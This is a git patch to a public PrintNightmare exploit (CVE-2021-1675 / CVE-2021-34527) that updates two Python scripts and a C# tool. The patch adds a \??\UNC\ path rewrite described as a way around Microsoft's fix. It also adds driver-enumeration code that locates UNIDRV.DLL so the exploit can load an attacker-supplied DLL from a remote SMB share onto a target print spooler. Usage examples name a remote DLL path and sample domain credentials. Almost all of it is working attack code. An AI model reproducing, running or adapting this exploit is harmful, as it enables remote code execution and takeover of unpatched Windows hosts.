From 640d1984cd4cf3fe47189c2cb89dcfb62e0ccb7c Mon Sep 17 00:00:00 2001
From: cube0x0 <vidfelt@protonmail.com>
Date: Thu, 8 Jul 2021 13:03:15 +0200
Subject: [PATCH] updated with \??\UNC\ path to avoid patch restriction

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
---
 CVE-2021-1675.py                              |  50 ++++++++++-------
 SharpPrintNightmare/CVE-2021-1675.py          |  51 +++++++++++-------
 .../.vs/SharpPrintNightmare/v16/.suo          | Bin 60928 -> 48128 bytes
 .../SharpPrintNightmare/Program.cs            |   4 ++
 4 files changed, 67 insertions(+), 38 deletions(-)

diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py
index fda7a8b..3e876bd 100644
--- a/CVE-2021-1675.py
+++ b/CVE-2021-1675.py
@@ -20,15 +20,25 @@ class DRIVER_INFO_2_BLOB(Structure):
 
     def __init__(self, data = None):
         Structure.__init__(self, data = data)
-
-    def fromString(self,data):
+    
+    def fromString(self, data, offset=0):
         Structure.fromString(self, data)
-        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
-        self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
-        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
-        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
-        self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
+        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']+offset:self['DataFileOffset']+offset].decode('utf-16-le')
+        self['DataFileArray'] = self.rawData[self['DataFileOffset']+offset:self['DriverPathOffset']+offset].decode('utf-16-le')
+        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']+offset:self['EnvironmentOffset']+offset].decode('utf-16-le')
+        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']+offset:self['NameOffset']+offset].decode('utf-16-le')
+        #self['NameArray'] = self.rawData[self['NameOffset']+offset:len(self.rawData)].decode('utf-16-le')
 
+class DRIVER_INFO_2_ARRAY(Structure):
+    def __init__(self, data = None, pcReturned = None):
+        Structure.__init__(self, data = data)
+        self['drivers'] = list()
+        remaining = data
+        if data is not None:
+            for i in range(pcReturned):
+                attr = DRIVER_INFO_2_BLOB(remaining)
+                self['drivers'].append(attr)
+                remaining = remaining[len(attr):]
 
 def connect(username, password, domain, lmhash, nthash, address, port):
     binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
@@ -53,17 +63,16 @@ def connect(username, password, domain, lmhash, nthash, address, port):
     return dce
 
 
-def getDrivers(dce, handle=NULL):
+def getDriver(dce, handle=NULL):
     #get drivers
     resp = rprn.hRpcEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
-    data = b''.join(resp['pDrivers'])
-
-    #parse drivers
-    blob = DRIVER_INFO_2_BLOB()
-    blob.fromString(data)
-    #blob.dump()
+    blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
+    for i in blobs['drivers']:
+        if "filerepository" in i['DriverPathArray'].lower():
+            return i
     
-    return blob
+    print("[-] Failed to find driver")
+    sys.exit(1)
 
 
 def main(dce, pDriverPath, share, handle=NULL):
@@ -99,7 +108,7 @@ def main(dce, pDriverPath, share, handle=NULL):
 
 
 if __name__ == '__main__':
-    parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
+    parser = argparse.ArgumentParser(add_help = True, description = "MS-RPRN PrintNightmare CVE-2021-1675 / CVE-2021-34527 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
 Example;
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
@@ -155,7 +164,7 @@ Example;
     #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
     if not options.pDriverPath:
         try:
-            blob = getDrivers(dce, handle)
+            blob = getDriver(dce, handle)
             pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
             if not "FileRepository" in pDriverPath:
                 print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
@@ -168,6 +177,9 @@ Example;
     else:
         pDriverPath = options.pDriverPath
 
+    if "\\\\" in options.share:
+        options.share = options.share.replace("\\\\","\\??\\UNC\\")
+
     print("[+] pDriverPath Found {0}".format(pDriverPath))
     print("[*] Executing {0}".format(options.share))
 
@@ -175,6 +187,6 @@ Example;
     print("[*] Try 1...")
     main(dce, pDriverPath, options.share)
     print("[*] Try 2...")
-    main(dce, pDriverPath,options.share)
+    main(dce, pDriverPath, options.share)
     print("[*] Try 3...")
-    main(dce, pDriverPath,options.share)
+    main(dce, pDriverPath, options.share)
diff --git a/SharpPrintNightmare/CVE-2021-1675.py b/SharpPrintNightmare/CVE-2021-1675.py
index 469c574..40d0232 100644
--- a/SharpPrintNightmare/CVE-2021-1675.py
+++ b/SharpPrintNightmare/CVE-2021-1675.py
@@ -20,14 +20,25 @@ class DRIVER_INFO_2_BLOB(Structure):
 
     def __init__(self, data = None):
         Structure.__init__(self, data = data)
-
-    def fromString(self,data):
+    
+    def fromString(self, data, offset=0):
         Structure.fromString(self, data)
-        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']:self['DataFileOffset']].decode('utf-16-le')
-        self['DataFileArray'] = self.rawData[self['DataFileOffset']:self['DriverPathOffset']].decode('utf-16-le')
-        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']:self['EnvironmentOffset']].decode('utf-16-le')
-        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']:self['NameOffset']].decode('utf-16-le')
-        self['NameArray'] = self.rawData[self['NameOffset']:len(self.rawData)].decode('utf-16-le')
+        self['ConfigFileArray'] = self.rawData[self['ConfigFileOffset']+offset:self['DataFileOffset']+offset].decode('utf-16-le')
+        self['DataFileArray'] = self.rawData[self['DataFileOffset']+offset:self['DriverPathOffset']+offset].decode('utf-16-le')
+        self['DriverPathArray'] = self.rawData[self['DriverPathOffset']+offset:self['EnvironmentOffset']+offset].decode('utf-16-le')
+        self['EnvironmentArray'] = self.rawData[self['EnvironmentOffset']+offset:self['NameOffset']+offset].decode('utf-16-le')
+        #self['NameArray'] = self.rawData[self['NameOffset']+offset:len(self.rawData)].decode('utf-16-le')
+
+class DRIVER_INFO_2_ARRAY(Structure):
+    def __init__(self, data = None, pcReturned = None):
+        Structure.__init__(self, data = data)
+        self['drivers'] = list()
+        remaining = data
+        if data is not None:
+            for i in range(pcReturned):
+                attr = DRIVER_INFO_2_BLOB(remaining)
+                self['drivers'].append(attr)
+                remaining = remaining[len(attr):]
 
 def connect(username, password, domain, lmhash, nthash, address, port):
     stringbinding = epm.hept_map(address, par.MSRPC_UUID_PAR, protocol='ncacn_ip_tcp')
@@ -41,17 +52,16 @@ def connect(username, password, domain, lmhash, nthash, address, port):
     dce.bind(par.MSRPC_UUID_PAR, transfer_syntax = ('8A885D04-1CEB-11C9-9FE8-08002B104860', '2.0'))
     return dce
 
-def getDrivers(dce, handle=NULL):
+def getDriver(dce, handle=NULL):
     #get drivers
     resp = par.hRpcAsyncEnumPrinterDrivers(dce, pName=handle, pEnvironment="Windows x64\x00", Level=2)
-    data = b''.join(resp['pDrivers'])
-
-    #parse drivers
-    blob = DRIVER_INFO_2_BLOB()
-    blob.fromString(data)
-    #blob.dump()
+    blobs = DRIVER_INFO_2_ARRAY(b''.join(resp['pDrivers']), resp['pcReturned'])
+    for i in blobs['drivers']:
+        if "filerepository" in i['DriverPathArray'].lower():
+            return i
     
-    return blob
+    print("[-] Failed to find driver")
+    sys.exit(1)
 
 
 def main(dce, pDriverPath, share, handle=NULL):
@@ -87,7 +97,7 @@ def main(dce, pDriverPath, share, handle=NULL):
 
 
 if __name__ == '__main__':
-    parser = argparse.ArgumentParser(add_help = True, description = "PrintNightmare CVE-2021-1675 / CVE-2021-34527  implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
+    parser = argparse.ArgumentParser(add_help = True, description = "MS-PAR PrintNightmare CVE-2021-1675 / CVE-2021-34527 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
 Example;
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
@@ -143,7 +153,7 @@ Example;
     #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
     if not options.pDriverPath:
         try:
-            blob = getDrivers(dce, handle)
+            blob = getDriver(dce, handle)
             pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
             if not "FileRepository" in pDriverPath:
                 print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
@@ -156,6 +166,9 @@ Example;
     else:
         pDriverPath = options.pDriverPath
 
+    if "\\\\" in options.share:
+        options.share = options.share.replace("\\\\","\\??\\UNC\\")
+
     print("[+] pDriverPath Found {0}".format(pDriverPath))
     print("[*] Executing {0}".format(options.share))
 
@@ -163,6 +176,6 @@ Example;
     print("[*] Try 1...")
     main(dce, pDriverPath, options.share)
     print("[*] Try 2...")
-    main(dce, pDriverPath,options.share)
+    main(dce, pDriverPath, options.share)
     print("[*] Try 3...")
-    main(dce, pDriverPath,options.share)
\ No newline at end of file
+    main(dce, pDriverPath, options.share)
\ No newline at end of file
diff --git a/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo b/SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
index 483c68f0b153dfd0459e7891fae971245621f020..aa552ae21424ab3d9b082d8ad512deacc081d10d 100644
GIT binary patch
delta 3188
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
GRrVVUxOy}I

delta 3466
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

diff --git a/SharpPrintNightmare/SharpPrintNightmare/Program.cs b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
index a9e4236..2a7b7c9 100644
--- a/SharpPrintNightmare/SharpPrintNightmare/Program.cs
+++ b/SharpPrintNightmare/SharpPrintNightmare/Program.cs
@@ -68,6 +68,10 @@ namespace SharpPrintNightmare
                 Environment.Exit(0);
             }
             dllpath = args[0];
+            if (dllpath.Contains("\\\\"))
+            {
+                dllpath = dllpath.Replace("\\\\", "\\??\\UNC\\");
+            }
 
             if (args.Length > 2)
             {